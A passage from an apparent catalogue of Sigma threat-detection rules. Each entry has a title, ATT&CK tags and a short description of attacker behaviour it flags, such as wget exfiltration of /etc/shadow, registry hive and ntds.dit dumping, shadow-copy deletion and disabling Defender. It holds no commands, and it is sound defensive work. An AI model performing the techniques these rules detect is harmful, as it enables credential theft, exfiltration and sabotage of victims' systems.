    calendar Aug 12, 2024 · attack.exfiltration attack.t1537  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.


    Read More
  • Data Exfiltration with Wget

    calendar Aug 12, 2024 · attack.exfiltration attack.t1048.003  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.


    Read More
  • DCERPC SMB Spoolss Named Pipe

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.


    Read More
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002 attack.t1021.003  ·
    Share on: twitter facebook linkedin copy

    Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.


    Read More
  • DD File Overwrite

    calendar Aug 12, 2024 · attack.impact attack.t1485  ·
    Share on: twitter facebook linkedin copy

    Detects potential overwriting and deletion of a file using DD.


    Read More
  • Decode Base64 Encoded Text

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects usage of base64 utility to decode arbitrary base64-encoded text


    Read More
  • Decode Base64 Encoded Text -MacOs

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects usage of base64 utility to decode arbitrary base64-encoded text


    Read More
  • Default Cobalt Strike Certificate

    calendar Aug 12, 2024 · attack.command-and-control attack.s0154  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of default Cobalt Strike certificate in the HTTPS traffic


    Read More
  • Default Credentials Usage

    calendar Aug 12, 2024 · attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.


    Read More
  • Default RDP Port Changed to Non Standard Port

    calendar Aug 12, 2024 · attack.persistence attack.t1547.010  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).


    Read More
  • Defrag Deactivation

    calendar Aug 12, 2024 · attack.persistence attack.t1053.005 attack.s0111 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group


    Read More
  • Defrag Deactivation - Security

    calendar Aug 12, 2024 · attack.persistence attack.t1053 attack.s0111 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group


    Read More
  • Delegated Permissions Granted For All Users

    calendar Aug 12, 2024 · attack.credential-access attack.t1528  ·
    Share on: twitter facebook linkedin copy

    Detects when highly privileged delegated permissions are granted on behalf of all users


    Read More
  • Delete All Scheduled Tasks

    calendar Aug 12, 2024 · attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.


    Read More
  • Delete Important Scheduled Task

    calendar Aug 12, 2024 · attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities


    Read More
  • Delete Volume Shadow Copies Via WMI With PowerShell

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Shadow Copies deletion using operating systems utilities via PowerShell


    Read More
  • Delete Volume Shadow Copies via WMI with PowerShell - PS Script

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil


    Read More
  • Deleted Data Overwritten Via Cipher.EXE

    calendar Aug 12, 2024 · attack.impact attack.t1485  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives


    Read More
  • Deletion of Volume Shadow Copies via WMI with PowerShell

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil


    Read More
  • Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil


    Read More
  • Denied Access To Remote Desktop

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.001  ·
    Share on: twitter facebook linkedin copy

    This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.


    Read More
  • Deny Service Access Using Security Descriptor Tampering Via Sc.EXE

    calendar Aug 12, 2024 · attack.persistence attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.


    Read More
  • Deployment AppX Package Was Blocked By AppLocker

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects an appx package deployment that was blocked by AppLocker policy


    Read More
  • Deployment Of The AppX Package Was Blocked By The Policy

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects an appx package deployment that was blocked by the local computer policy


    Read More
  • Detect Virtualbox Driver Installation OR Starting Of VMs

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1564.006 attack.t1564  ·
    Share on: twitter facebook linkedin copy

    Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.


    Read More
  • Detected Windows Software Discovery

    calendar Aug 12, 2024 · attack.discovery attack.t1518  ·
    Share on: twitter facebook linkedin copy

    Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.


    Read More
  • Detected Windows Software Discovery - PowerShell

    calendar Aug 12, 2024 · attack.discovery attack.t1518  ·
    Share on: twitter facebook linkedin copy

    Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.


    Read More
  • Detection of PowerShell Execution via Sqlps.exe

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1127  ·
    Share on: twitter facebook linkedin copy

    This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.


    Read More
  • Device Installation Blocked

    calendar Aug 12, 2024 · attack.initial-access attack.t1200  ·
    Share on: twitter facebook linkedin copy

    Detects an installation of a device that is forbidden by the system policy


    Read More
  • Device Registration or Join Without MFA

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Monitor and alert for device registration or join events where MFA was not performed.


    Read More
  • DeviceCredentialDeployment Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of DeviceCredentialDeployment to hide a process from view


    Read More
  • Devil Bait Potential C2 Communication Traffic

    calendar Aug 12, 2024 · attack.command-and-control detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential C2 communication related to Devil Bait malware


    Read More
  • Devtoolslauncher.exe Executes Specified Binary

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    The Devtoolslauncher.exe executes other binary


    Read More
  • DEWMODE Webshell Access

    calendar Aug 12, 2024 · attack.persistence attack.t1505.003 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects access to DEWMODE webshell as described in FIREEYE report


    Read More
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1202 cve.2022-30190  ·
    Share on: twitter facebook linkedin copy

    Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library


    Read More
  • DiagTrackEoP Default Login Username

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the default "UserName" used by the DiagTrackEoP POC


    Read More
  • Directory Removal Via Rmdir

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.


    Read More
  • Directory Service Restore Mode(DSRM) Registry Value Tampering

    calendar Aug 12, 2024 · attack.persistence attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.


    Read More
  • DirectorySearcher Powershell Exploitation

    calendar Aug 12, 2024 · attack.discovery attack.t1018  ·
    Share on: twitter facebook linkedin copy

    Enumerates Active Directory to determine computers that are joined to the domain


    Read More
  • DirLister Execution

    calendar Aug 12, 2024 · attack.discovery attack.t1083  ·
    Share on: twitter facebook linkedin copy

    Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.


    Read More
  • Disable Administrative Share Creation at Startup

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.005  ·
    Share on: twitter facebook linkedin copy

    Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system


    Read More
  • Disable Exploit Guard Network Protection on Windows Defender

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling Windows Defender Exploit Guard Network Protection


    Read More
  • Disable Macro Runtime Scan Scope

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros


    Read More
  • Disable Microsoft Defender Firewall via Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage


    Read More
  • Disable of ETW Trace - Powershell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002  ·
    Share on: twitter facebook linkedin copy

    Detects usage of powershell cmdlets to disable or remove ETW trace sessions


    Read More
  • Disable Or Stop Services

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services


    Read More
  • Disable Powershell Command History

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.003  ·
    Share on: twitter facebook linkedin copy

    Detects scripts or commands that disabled the Powershell command history by removing psreadline module


    Read More
  • Disable Privacy Settings Experience in Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects registry modifications that disable Privacy Settings Experience


    Read More
  • Disable PUA Protection on Windows Defender

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling Windows Defender PUA protection


    Read More
  • Disable Security Events Logging Adding Reg Key MiniNt

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.


    Read More
  • Disable Security Tools

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling security tools


    Read More
  • Disable System Firewall

    calendar Aug 12, 2024 · attack.t1562.004 attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.


    Read More
  • Disable Tamper Protection on Windows Defender

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects disabling Windows Defender Tamper Protection


    Read More
  • Disable Windows Defender AV Security Monitoring

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects attackers attempting to disable Windows Defender using Powershell


    Read More
  • Disable Windows Firewall by Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detect set EnableFirewall to 0 to disable the Windows firewall


    Read More
  • Disable Windows IIS HTTP Logging

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)


    Read More
  • Disable Windows Security Center Notifications

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect set UseActionCenterExperience to 0 to disable the Windows security center notification


    Read More
  • Disable-WindowsOptionalFeature Command PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images


    Read More
  • Disabled IE Security Features

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features


    Read More
  • Disabled MFA to Bypass Authentication Mechanisms

    calendar Aug 12, 2024 · attack.persistence attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.


    Read More
  • Disabled Volume Snapshots

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects commands that temporarily turn off Volume Snapshots


    Read More
  • Disabled Windows Defender Eventlog

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections


    Read More
  • Disabling Multi Factor Authentication

    calendar Aug 12, 2024 · attack.persistence attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detects disabling of Multi Factor Authentication.


    Read More
  • Disabling Security Tools

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects disabling security tools


    Read More
  • Disabling Security Tools - Builtin

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects disabling security tools


    Read More
  • Discovery of a System Time

    calendar Aug 12, 2024 · attack.discovery attack.t1124  ·
    Share on: twitter facebook linkedin copy

    Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.


    Read More
  • Discovery Using AzureHound

    calendar Aug 12, 2024 · attack.discovery attack.t1087.004 attack.t1526  ·
    Share on: twitter facebook linkedin copy

    Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.


    Read More
  • Disk Image Creation Via Hdiutil - MacOS

    calendar Aug 12, 2024 · attack.exfiltration  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hdiutil utility in order to create a disk image.


    Read More
  • Disk Image Mounting Via Hdiutil - MacOS

    calendar Aug 12, 2024 · attack.initial-access attack.t1566.001 attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hdiutil utility in order to mount disk images.


    Read More
  • Django Framework Exceptions

    calendar Aug 12, 2024 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious Django web application framework exceptions that could indicate exploitation attempts


    Read More
  • DLL Execution via Rasautou.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.


    Read More
  • DLL Execution Via Register-cimprovider.exe

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1574  ·
    Share on: twitter facebook linkedin copy

    Detects using register-cimprovider.exe to execute arbitrary dll file.


    Read More
  • DLL Load By System Process From Suspicious Locations

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"


    Read More
  • DLL Load via LSASS

    calendar Aug 12, 2024 · attack.execution attack.persistence attack.t1547.008  ·
    Share on: twitter facebook linkedin copy

    Detects a method to load DLL via LSASS process using an undocumented Registry key


    Read More
  • DLL Loaded From Suspicious Location Via Cmspt.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.003  ·
    Share on: twitter facebook linkedin copy

    Detects cmstp loading "dll" or "ocx" files from suspicious locations


    Read More
  • DLL Loaded via CertOC.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.


    Read More
  • Dllhost.EXE Execution Anomaly

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.


    Read More
  • DllUnregisterServer Function Call Via Msiexec.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.007  ·
    Share on: twitter facebook linkedin copy

    Detects MsiExec loading a DLL and calling its DllUnregisterServer function


    Read More
  • DNS Events Related To Mining Pools

    calendar Aug 12, 2024 · attack.execution attack.t1569.002 attack.impact attack.t1496  ·
    Share on: twitter facebook linkedin copy

    Identifies clients that may be performing DNS lookups associated with common currency mining pools.


    Read More
  • DNS Exfiltration and Tunneling Tools Execution

    calendar Aug 12, 2024 · attack.exfiltration attack.t1048.001 attack.command-and-control attack.t1071.004 attack.t1132.001  ·
    Share on: twitter facebook linkedin copy

    Well-known DNS Exfiltration tools execution


    Read More
  • DNS HybridConnectionManager Service Bus

    calendar Aug 12, 2024 · attack.persistence attack.t1554  ·
    Share on: twitter facebook linkedin copy

    Detects Azure Hybrid Connection Manager services querying the Azure service bus service


    Read More
  • DNS Query for Anonfiles.com Domain - DNS Client

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes


    Read More
  • DNS Query for Anonfiles.com Domain - Sysmon

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes


    Read More
  • DNS Query Request By Regsvr32.EXE

    calendar Aug 12, 2024 · attack.execution attack.t1559.001 attack.defense-evasion attack.t1218.010  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries initiated by "Regsvr32.exe"


    Read More
  • DNS Query To AzureWebsites.NET By Non-Browser Process

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.


    Read More
  • DNS Query to External Service Interaction Domains

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.reconnaissance attack.t1595.002  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE


    Read More
  • DNS Query To MEGA Hosting Website

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for subdomains related to MEGA sharing website


    Read More
  • DNS Query To MEGA Hosting Website - DNS Client

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for subdomains related to MEGA sharing website


    Read More
  • DNS Query To Ufile.io

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration


    Read More
  • DNS Query To Ufile.io - DNS Client

    calendar Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration


    Read More
  • DNS Query Tor .Onion Address - Sysmon

    calendar Aug 12, 2024 · attack.command-and-control attack.t1090.003  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries to an ".onion" address related to Tor routing networks


    Read More
  • DNS RCE CVE-2020-1350

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1569.002 cve.2020-1350 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process


    Read More
  • DNS Server Discovery Via LDAP Query

    calendar Aug 12, 2024 · attack.discovery attack.t1482  ·
    Share on: twitter facebook linkedin copy

    Detects DNS server discovery via LDAP query requests from uncommon applications


    Read More
  • DNS TOR Proxies

    calendar Aug 12, 2024 · attack.exfiltration attack.t1048  ·
    Share on: twitter facebook linkedin copy

    Identifies IPs performing DNS lookups associated with common Tor proxies.


    Read More
  • DNS TXT Answer with Possible Execution Strings

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.004  ·
    Share on: twitter facebook linkedin copy

    Detects strings used in command execution in DNS TXT Answer


    Read More
  • DNS-over-HTTPS Enabled by Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1140 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.


    Read More
  • Docker Container Discovery Via Dockerenv Listing

    calendar Aug 12, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery


    Read More
  • Domain Trust Discovery Via Dsquery

    calendar Aug 12, 2024 · attack.discovery attack.t1482  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "dsquery.exe" for domain trust discovery


    Read More
  • DotNET Assembly DLL Loaded Via Office Application

    calendar Aug 12, 2024 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects any assembly DLL being loaded by an Office Product


    Read More
  • DotNet CLR DLL Loaded By Scripting Applications

    calendar Aug 12, 2024 · attack.execution attack.privilege-escalation attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.


    Read More
  • Download File To Potentially Suspicious Directory Via Wget

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the use of wget to download content to a suspicious directory


    Read More
  • Download from Suspicious Dyndns Hosts

    calendar Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1105 attack.t1568  ·
    Share on: twitter facebook linkedin copy

    Detects download of certain file types from hosts with dynamic DNS names (selected list)


    Read More
  • Download From Suspicious TLD - Blacklist

    calendar Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects download of certain file types from hosts in suspicious TLDs


    Read More
  • Download From Suspicious TLD - Whitelist

    calendar Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects executable downloads from suspicious remote systems


    Read More
  • DPAPI Backup Keys And Certificate Export Activity IOC

    calendar Aug 12, 2024 · attack.t1555 attack.t1552.004  ·
    Share on: twitter facebook linkedin copy

    Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.


    Read More
  • DPAPI Domain Backup Key Extraction

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.004  ·
    Share on: twitter facebook linkedin copy

    Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers


    Read More
  • DPAPI Domain Master Key Backup Attempt

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.004  ·
    Share on: twitter facebook linkedin copy

    Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.


    Read More
  • Driver Load From A Temporary Directory

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects a driver load from a temporary directory


    Read More
  • Driver/DLL Installation Via Odbcconf.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.008  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.


    Read More
  • DriverQuery.EXE Execution

    calendar Aug 12, 2024 · attack.discovery  ·
    Share on: twitter facebook linkedin copy

    Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers


    Read More
  • Drop Binaries Into Spool Drivers Color Folder

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color" as seen in the blog referenced below


    Read More
  • Droppers Exploiting CVE-2017-11882

    calendar Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-11882 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe


    Read More
  • Dropping Of Password Filter DLL

    calendar Aug 12, 2024 · attack.credential-access attack.t1556.002  ·
    Share on: twitter facebook linkedin copy

    Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS


    Read More
  • DSInternals Suspicious PowerShell Cmdlets

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.


    Read More
  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.


    Read More
  • Dump Credentials from Windows Credential Manager With PowerShell

    calendar Aug 12, 2024 · attack.credential-access attack.t1555  ·
    Share on: twitter facebook linkedin copy

    Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.


    Read More
  • Dump Ntds.dit To Suspicious Location

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location


    Read More
  • Dumping of Sensitive Hives Via Reg.EXE

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.004 attack.t1003.005 car.2013-07-001  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.


    Read More
  • Dumping Process via Sqldumper.exe

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects process dump via legitimate sqldumper.exe binary


    Read More
  • DumpStack.log Defender Evasion

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the filename DumpStack.log to evade Microsoft Defender


    Read More
  • Dynamic .NET Compilation Via Csc.EXE

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027.004  ·
    Share on: twitter facebook linkedin copy

